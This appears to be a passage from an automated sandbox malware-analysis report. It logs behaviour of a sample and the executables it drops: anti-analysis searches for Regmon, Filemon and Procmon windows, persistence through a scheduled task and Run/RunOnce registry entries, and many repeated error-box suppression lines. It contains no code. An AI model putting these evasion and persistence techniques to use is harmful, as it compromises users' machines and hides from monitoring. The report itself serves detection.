Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce acentric
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce acentric
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce acentric
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce acentric

Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
